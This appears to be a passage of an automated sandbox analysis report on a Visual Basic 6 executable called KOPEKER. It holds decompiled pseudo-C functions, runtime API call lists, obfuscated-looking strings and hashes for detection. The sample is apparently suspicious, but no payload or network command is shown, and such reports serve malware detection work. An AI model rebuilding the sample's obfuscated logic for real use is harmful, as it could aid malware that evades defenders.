					_push(0x108);
					_push(0x411c4c);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v88 = _t70;
				}
				_t71 = _v48;
				_v36 = _t71;
				L004018AC();
				_push(0x411c60);
				L00401834();
				if(_t71 != 1) {
					_push(0xff8d5482);
					_push(L"samtaleemnetsrhes");
					_push(L"Hofdesserternes7");
					_push(0);
					L0040182E();
					_v28 = _t71;
				}
				_v32 = 0x1e2c;
				asm("wait");
				_push(0x41503f);
				L00401924();
				return _t71;
			}





























          0x00414e5a
          0x00414e69
          0x00414e73
          0x00414e7b
          0x00414e7e
          0x00414e85
          0x00414e94
          0x00414e9f
          0x00414ea4
          0x00414ea6
          0x00414ea8
          0x00414eaa
          0x00414eac
          0x00414eb1
          0x00414eb4
          0x00414ebb
          0x00414ebe
          0x00414ec3
          0x00414ec6
          0x00414ecb
          0x00414ed2
          0x00414eda
          0x00414ee7
          0x00414ef1
          0x00414efb
          0x00414f05
          0x00414f12
          0x00414f18
          0x00414f1a
          0x00414f21
          0x00414f3d
          0x00414f23
          0x00414f23
          0x00414f28
          0x00414f2d
          0x00414f30
          0x00414f33
          0x00414f38
          0x00414f38
          0x00414f21
          0x00414f48
          0x00414f62
          0x00414f4a
          0x00414f4a
          0x00414f4f
          0x00414f54
          0x00414f59
          0x00414f59
          0x00414f6e
          0x00414f7d
          0x00414f80
          0x00414f82
          0x00414f89
          0x00414fa2
          0x00414f8b
          0x00414f8b
          0x00414f8d
          0x00414f92
          0x00414f95
          0x00414f98
          0x00414f9d
          0x00414f9d
          0x00414fa9
          0x00414fb8
          0x00414fbe
          0x00414fc0
          0x00414fc7
          0x00414fe3
          0x00414fc9
          0x00414fc9
          0x00414fce
          0x00414fd3
          0x00414fd6
          0x00414fd9
          0x00414fde
          0x00414fde
          0x00414fe7
          0x00414feb
          0x00414ff2
          0x00414ff7
          0x00414ffc
          0x00415004
          0x00415006
          0x0041500b
          0x00415010
          0x00415015
          0x00415017
          0x0041501c
          0x0041501c
          0x0041501f
          0x00415025
          0x00415026
          0x00415039
          0x0041503e

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414E73
          • __vbaStrCopy.MSVBVM60(?,?,?,?,004016F6), ref: 00414E9F
          • #712.MSVBVM60(00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EB4
          • __vbaStrMove.MSVBVM60(00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EBE
          • __vbaStrCmp.MSVBVM60(00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414ECB
          • __vbaFpI4.MSVBVM60(00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414EDA
          • __vbaHresultCheckObj.MSVBVM60(00000000,004014E0,004105B8,000002C8,?,?,?,?,00000000,00411C44,00000000,00000000,00411A30), ref: 00414F33
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411C44,00000000,00000000,00411A30,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414F54
          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411AD0,00000014), ref: 00414F98
          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411C4C,00000108), ref: 00414FD9
          • __vbaFreeObj.MSVBVM60(00000000,00000000,00411C4C,00000108), ref: 00414FF2
          • __vbaLenBstr.MSVBVM60(00411C60), ref: 00414FFC
          • __vbaInStr.MSVBVM60(00000000,Hofdesserternes7,samtaleemnetsrhes,FF8D5482,00411C60), ref: 00415017
          • __vbaFreeStr.MSVBVM60(0041503F,00411C60), ref: 00415039
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$#712BstrChkstkCopyMoveNew2
          • String ID: Hofdesserternes7$samtaleemnetsrhes$val
          • API String ID: 1974484846-2599820437
          • Opcode ID: c5c267184dc340cfc9bf68ffff00cbaea68062972cda6ed2da3d5e76db945bf8
          • Instruction ID: eb2c0fe58a4518b94977757f63af428bbb9ae2c61f6be94a9ece1075485d274b
          • Opcode Fuzzy Hash: c5c267184dc340cfc9bf68ffff00cbaea68062972cda6ed2da3d5e76db945bf8
          • Instruction Fuzzy Hash: 97512571A40208EFCB00EF95D949FDEBBB0BF08744F20812AF541B62B1DBB95991DB59
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004174EC, Relevance: 27.2, APIs: 18, Instructions: 171COMMON
          Download Yara Rule
          C-Code - Quality: 57%
          			E004174EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t96;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				void* _t135;
				void* _t137;
				intOrPtr _t138;

				_t138 = _t137 - 0xc;
				 *[fs:0x0] = _t138;
				L004016F0();
				_v16 = _t138;
				_v12 = 0x4016e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4016f6, _t135);
				if( *0x4183d8 != 0) {
					_v92 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v92 = 0x4183d8;
				}
				_v60 =  *_v92;
				_t96 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t96;
				if(_v64 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v96 = _t96;
				}
				_v68 = _v40;
				_t101 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t101;
				if(_v72 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411c4c);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v100 = _t101;
				}
				_t102 = _v36;
				_v84 = _t102;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(1);
				_push(0x411f60);
				L00401786();
				L00401882();
				_push(_t102);
				_push(0x411cf4);
				L0040184C();
				asm("sbb eax, eax");
				_v60 =  ~( ~( ~_t102));
				L00401924();
				_t106 = _v60;
				if(_t106 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v60 =  *_v104;
					_t112 =  *((intOrPtr*)( *_v60 + 0x1c))(_v60,  &_v40);
					asm("fclex");
					_v64 = _t112;
					if(_v64 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v108 = _t112;
					}
					_v68 = _v40;
					_v48 = 0x80020004;
					_v56 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t118 =  *((intOrPtr*)( *_v68 + 0x5c))(_v68, 0x10,  &_v36);
					asm("fclex");
					_v72 = _t118;
					if(_v72 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411c24);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v112 = _t118;
					}
					_t106 = _v36;
					_v88 = _t106;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_push(0x417735);
				L00401924();
				L00401924();
				return _t106;
			}

































          0x004174ef
          0x004174fe
          0x00417508
          0x00417510
          0x00417513
          0x0041751a
          0x00417529
          0x00417533
          0x0041754d
          0x00417535
          0x00417535
          0x0041753a
          0x0041753f
          0x00417544
          0x00417544
          0x00417559
          0x00417568
          0x0041756b
          0x0041756d
          0x00417574
          0x0041758d
          0x00417576
          0x00417576
          0x00417578
          0x0041757d
          0x00417580
          0x00417583
          0x00417588
          0x00417588
          0x00417594
          0x004175a3
          0x004175a9
          0x004175ab
          0x004175b2
          0x004175ce
          0x004175b4
          0x004175b4
          0x004175b9
          0x004175be
          0x004175c1
          0x004175c4
          0x004175c9
          0x004175c9
          0x004175d2
          0x004175d5
          0x004175d8
          0x004175e2
          0x004175ea
          0x004175ef
          0x004175f1
          0x004175f6
          0x00417600
          0x00417605
          0x00417606
          0x0041760b
          0x00417612
          0x00417618
          0x0041761f
          0x00417624
          0x0041762a
          0x00417637
          0x00417651
          0x00417639
          0x00417639
          0x0041763e
          0x00417643
          0x00417648
          0x00417648
          0x0041765d
          0x0041766c
          0x0041766f
          0x00417671
          0x00417678
          0x00417691
          0x0041767a
          0x0041767a
          0x0041767c
          0x00417681
          0x00417684
          0x00417687
          0x0041768c
          0x0041768c
          0x00417698
          0x0041769b
          0x004176a2
          0x004176b0
          0x004176ba
          0x004176bb
          0x004176bc
          0x004176bd
          0x004176c6
          0x004176c9
          0x004176cb
          0x004176d2
          0x004176eb
          0x004176d4
          0x004176d4
          0x004176d6
          0x004176db
          0x004176de
          0x004176e1
          0x004176e6
          0x004176e6
          0x004176ef
          0x004176f2
          0x004176f5
          0x004176ff
          0x00417707
          0x00417707
          0x0041770c
          0x00417727
          0x0041772f
          0x00417734

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00417508
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 0041753F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 00417583
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175C4
          • __vbaStrMove.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175E2
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,000000E0), ref: 004175EA
          • #616.MSVBVM60(00411F60,00000001), ref: 004175F6
          • __vbaStrMove.MSVBVM60(00411F60,00000001), ref: 00417600
          • __vbaStrCmp.MSVBVM60(00411CF4,00000000,00411F60,00000001), ref: 0041760B
          • __vbaFreeStr.MSVBVM60(00411CF4,00000000,00411F60,00000001), ref: 0041761F
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411CF4,00000000,00411F60,00000001), ref: 00417643
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 00417687
          • __vbaChkstk.MSVBVM60(00000000), ref: 004176B0
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 004176E1
          • __vbaStrMove.MSVBVM60(00000000,?,00411C24,0000005C), ref: 004176FF
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C24,0000005C), ref: 00417707
          • __vbaFreeStr.MSVBVM60(00417735,00411CF4,00000000,00411F60,00000001), ref: 00417727
          • __vbaFreeStr.MSVBVM60(00417735,00411CF4,00000000,00411F60,00000001), ref: 0041772F
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$Move$ChkstkNew2$#616
          • String ID:
          • API String ID: 5717343-0
          • Opcode ID: 55827eb7862dedb62ec7faf39c9a2e8607f41220bed7a7c88dd8d53cb0e3d13f
          • Instruction ID: 70208903a64aba6f0e4c8a5e0a2c1357743851c8bd275878065304b184508531
          • Opcode Fuzzy Hash: 55827eb7862dedb62ec7faf39c9a2e8607f41220bed7a7c88dd8d53cb0e3d13f
          • Instruction Fuzzy Hash: 9C71E271D40208EFCF00EF95C985BDEBBB1AF08745F20442AF505BB2A1DBB96985DB58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00415A39, Relevance: 25.7, APIs: 17, Instructions: 158COMMON
          Download Yara Rule
          C-Code - Quality: 34%
          			E00415A39(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char* _v76;
				char _v84;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				char* _t78;
				char* _t79;
				signed int _t85;
				signed int _t92;
				signed int _t98;
				intOrPtr _t118;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				L004016F0();
				_v12 = _t118;
				_v8 = 0x401570;
				_push(0x411d1c);
				L004017F2();
				if(0x80 != 2) {
					if( *0x4183d8 != 0) {
						_v132 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v132 = 0x4183d8;
					}
					_v104 =  *_v132;
					_t92 =  *((intOrPtr*)( *_v104 + 0x1c))(_v104,  &_v48);
					asm("fclex");
					_v108 = _t92;
					if(_v108 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x411ad0);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v136 = _t92;
					}
					_v112 = _v48;
					_v76 = 0x80020004;
					_v84 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t98 =  *((intOrPtr*)( *_v112 + 0x54))(_v112, 0x10,  &_v52);
					asm("fclex");
					_v116 = _t98;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411c24);
						_push(_v112);
						_push(_v116);
						L00401906();
						_v140 = _t98;
					}
					_v124 = _v52;
					_v52 = _v52 & 0x00000000;
					_v60 = _v124;
					_v68 = 9;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_v76 =  &_v24;
				_v84 = 0x6003;
				_t78 =  &_v84;
				_push(_t78);
				L0040185E();
				if(_t78 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v144 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v144 = 0x4183d8;
					}
					_v104 =  *_v144;
					_t85 =  *((intOrPtr*)( *_v104 + 0x48))(_v104, 0x43,  &_v44);
					asm("fclex");
					_v108 = _t85;
					if(_v108 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x411ad0);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v148 = _t85;
					}
					_v128 = _v44;
					_v44 = _v44 & 0x00000000;
					L00401882();
				}
				_v36 = 0x76e8d350;
				_v32 = 0x5af4;
				_push(0x415c87);
				_t79 =  &_v24;
				_push(_t79);
				_push(0);
				L00401858();
				L00401924();
				L004018AC();
				return _t79;
			}


































          0x00415a3e
          0x00415a49
          0x00415a4a
          0x00415a56
          0x00415a5e
          0x00415a61
          0x00415a68
          0x00415a6d
          0x00415a75
          0x00415a82
          0x00415a9c
          0x00415a84
          0x00415a84
          0x00415a89
          0x00415a8e
          0x00415a93
          0x00415a93
          0x00415aa8
          0x00415ab7
          0x00415aba
          0x00415abc
          0x00415ac3
          0x00415adf
          0x00415ac5
          0x00415ac5
          0x00415ac7
          0x00415acc
          0x00415acf
          0x00415ad2
          0x00415ad7
          0x00415ad7
          0x00415ae9
          0x00415aec
          0x00415af3
          0x00415b01
          0x00415b0b
          0x00415b0c
          0x00415b0d
          0x00415b0e
          0x00415b17
          0x00415b1a
          0x00415b1c
          0x00415b23
          0x00415b3f
          0x00415b25
          0x00415b25
          0x00415b27
          0x00415b2c
          0x00415b2f
          0x00415b32
          0x00415b37
          0x00415b37
          0x00415b49
          0x00415b4c
          0x00415b53
          0x00415b56
          0x00415b5d
          0x00415b60
          0x00415b6a
          0x00415b6b
          0x00415b6c
          0x00415b6d
          0x00415b6e
          0x00415b70
          0x00415b73
          0x00415b7b
          0x00415b83
          0x00415b83
          0x00415b8b
          0x00415b8e
          0x00415b95
          0x00415b98
          0x00415b99
          0x00415ba2
          0x00415baf
          0x00415bcc
          0x00415bb1
          0x00415bb1
          0x00415bb6
          0x00415bbb
          0x00415bc0
          0x00415bc0
          0x00415bde
          0x00415bef
          0x00415bf2
          0x00415bf4
          0x00415bfb
          0x00415c17
          0x00415bfd
          0x00415bfd
          0x00415bff
          0x00415c04
          0x00415c07
          0x00415c0a
          0x00415c0f
          0x00415c0f
          0x00415c21
          0x00415c24
          0x00415c2e
          0x00415c2e
          0x00415c33
          0x00415c3a
          0x00415c41
          0x00415c6b
          0x00415c6e
          0x00415c6f
          0x00415c71
          0x00415c79
          0x00415c81
          0x00415c86

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415A56
          • __vbaLenBstrB.MSVBVM60(00411D1C,?,?,?,?,004016F6), ref: 00415A6D
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00411D1C,?,?,?,?,004016F6), ref: 00415A8E
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,0000001C), ref: 00415AD2
          • __vbaChkstk.MSVBVM60(?), ref: 00415B01
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C24,00000054), ref: 00415B32
          • __vbaChkstk.MSVBVM60(00000000,?,00411C24,00000054), ref: 00415B60
          • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00415B73
          • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00415B7B
          • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00415B83
          • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411D1C), ref: 00415B99
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411D1C), ref: 00415BBB
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000048), ref: 00415C0A
          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00006003), ref: 00415C2E
          • __vbaAryDestruct.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C71
          • __vbaFreeStr.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C79
          • __vbaFreeObj.MSVBVM60(00000000,?,00415C87,00006003), ref: 00415C81
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckChkstkHresult$New2$#556BstrDestructLateMove
          • String ID:
          • API String ID: 3585757769-0
          • Opcode ID: 3056ca797921c6cd124661e1fff0585c4cb268c6ffb10ac798b83e84e639ebab
          • Instruction ID: 5e9754389d3d2dc98908c1484a38d1c68dae30681688a402599ce784e523a8cd
          • Opcode Fuzzy Hash: 3056ca797921c6cd124661e1fff0585c4cb268c6ffb10ac798b83e84e639ebab
          • Instruction Fuzzy Hash: 8D611471940718DFDB10EF94C886BDEBBB4BF08704F20442AE505BB2A1D7B96985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416535, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 150COMMON
          Download Yara Rule
          C-Code - Quality: 56%
          			E00416535(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				long long _v32;
				void* _v36;
				char _v52;
				char _v68;
				char* _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed long long _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				signed int _t66;
				signed int _t69;
				signed int _t75;
				signed int _t80;
				short _t81;
				signed int _t84;
				char* _t87;
				intOrPtr _t94;
				intOrPtr* _t95;
				signed long long _t105;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t94;
				L004016F0();
				_v12 = _t94;
				_v8 = 0x401630;
				_v92 = L"01/01/01";
				_v100 = 8;
				_t87 =  &_v52;
				L004018A0();
				_push( &_v52);
				_push( &_v68);
				L004017C2();
				_v108 = 0x7d1;
				_v116 = 0x8002;
				_push( &_v68);
				_t66 =  &_v116;
				_push(_t66);
				L00401828();
				_v124 = _t66;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401942();
				_t95 = _t94 + 0xc;
				_t69 = _v124;
				if(_t69 != 0) {
					_push(_t87);
					_v52 =  *0x401628;
					_t105 =  *0x401620 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t105 = _t105 /  *0x401610;
					}
					_v144 = _t105;
					 *_t95 = _v144;
					_v68 =  *0x401608;
					L0040183A();
					 *_t95 =  *0x4015f8;
					 *_t95 =  *0x4015f4;
					 *_t95 =  *0x4015f0;
					_t84 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t87, _t87, _t87, _t69, _t87, _t87);
					asm("fclex");
					_v124 = _t84;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x4105b8);
						_push(_a4);
						_push(_v124);
						L00401906();
						_v148 = _t84;
					}
				}
				if( *0x4183d8 != 0) {
					_v152 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v152 = 0x4183d8;
				}
				_v124 =  *_v152;
				_t75 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v36);
				asm("fclex");
				_v128 = _t75;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v124);
					_push(_v128);
					L00401906();
					_v156 = _t75;
				}
				_v132 = _v36;
				_t80 =  *((intOrPtr*)( *_v132 + 0x108))(_v132,  &_v120);
				asm("fclex");
				_v136 = _t80;
				if(_v136 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411c4c);
					_push(_v132);
					_push(_v136);
					L00401906();
					_v160 = _t80;
				}
				_t81 = _v120;
				_v24 = _t81;
				L004018AC();
				_v32 =  *0x4015e8;
				asm("wait");
				_push(0x41678a);
				return _t81;
			}


































          0x0041653a
          0x00416545
          0x00416546
          0x00416552
          0x0041655a
          0x0041655d
          0x00416564
          0x0041656b
          0x00416575
          0x00416578
          0x00416580
          0x00416584
          0x00416585
          0x0041658a
          0x00416591
          0x0041659b
          0x0041659c
          0x0041659f
          0x004165a0
          0x004165a5
          0x004165ac
          0x004165b0
          0x004165b1
          0x004165b3
          0x004165b8
          0x004165bb
          0x004165c1
          0x004165cd
          0x004165ce
          0x004165d7
          0x004165e4
          0x004165ee
          0x004165f4
          0x004165fa
          0x004165e6
          0x004165e6
          0x004165e6
          0x004165ff
          0x0041660c
          0x00416616
          0x0041661f
          0x0041662c
          0x00416636
          0x00416640
          0x00416650
          0x00416656
          0x00416658
          0x0041665f
          0x0041667e
          0x00416661
          0x00416661
          0x00416666
          0x0041666b
          0x0041666e
          0x00416671
          0x00416676
          0x00416676
          0x0041665f
          0x0041668c
          0x004166a9
          0x0041668e
          0x0041668e
          0x00416693
          0x00416698
          0x0041669d
          0x0041669d
          0x004166bb
          0x004166ca
          0x004166cd
          0x004166cf
          0x004166d6
          0x004166f2
          0x004166d8
          0x004166d8
          0x004166da
          0x004166df
          0x004166e2
          0x004166e5
          0x004166ea
          0x004166ea
          0x004166fc
          0x0041670b
          0x00416711
          0x00416713
          0x00416720
          0x00416742
          0x00416722
          0x00416722
          0x00416727
          0x0041672c
          0x0041672f
          0x00416735
          0x0041673a
          0x0041673a
          0x00416749
          0x0041674d
          0x00416754
          0x0041675f
          0x00416762
          0x00416763
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416552
          • __vbaVarDup.MSVBVM60 ref: 00416578
          • #553.MSVBVM60(?,?), ref: 00416585
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 004165A0
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 004165B3
          • _adj_fdiv_m64.MSVBVM60 ref: 004165FA
          • __vbaFpI4.MSVBVM60 ref: 0041661F
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004105B8,000002C0), ref: 00416671
          • __vbaNew2.MSVBVM60(00411AE0,004183D8), ref: 00416698
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 004166E5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,00000108), ref: 00416735
          • __vbaFreeObj.MSVBVM60(00000000,?,00411C4C,00000108), ref: 00416754
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckHresult$Free$#553ChkstkListNew2_adj_fdiv_m64
          • String ID: 01/01/01
          • API String ID: 2139296166-1279165767
          • Opcode ID: 055a181fd9c3a42d23bf47e62cae28a67159e67bd391382cdf578f86af3ced49
          • Instruction ID: fc788b5fc76ec4c661babd42eed99f46b999cce5e48750d7f78bd91adb4cebaf
          • Opcode Fuzzy Hash: 055a181fd9c3a42d23bf47e62cae28a67159e67bd391382cdf578f86af3ced49
          • Instruction Fuzzy Hash: 8E515671900218EFDB10AFA0CD49BEDBBB8FB08704F1544AEE149B71A1DB789994DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416A3A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96COMMON
          Download Yara Rule
          C-Code - Quality: 62%
          			E00416A3A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t60;
				signed int _t65;
				signed int _t66;
				void* _t78;
				void* _t80;
				intOrPtr _t81;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				L004016F0();
				_v16 = _t81;
				_v12 = 0x401650;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x4016f6, _t78);
				_push(L"7:7:7");
				_push( &_v56);
				L004017AA();
				_push( &_v56);
				L004017B0();
				L00401882();
				L00401912();
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v60 =  *_v88;
				_t60 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t60;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v92 = _t60;
				}
				_v68 = _v40;
				_t65 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t65;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411c4c);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v96 = _t65;
				}
				_t66 = _v36;
				_v84 = _t66;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(0x416b97);
				L00401924();
				L00401924();
				return _t66;
			}

























          0x00416a3d
          0x00416a4c
          0x00416a56
          0x00416a5e
          0x00416a61
          0x00416a68
          0x00416a77
          0x00416a7a
          0x00416a82
          0x00416a83
          0x00416a8b
          0x00416a8c
          0x00416a96
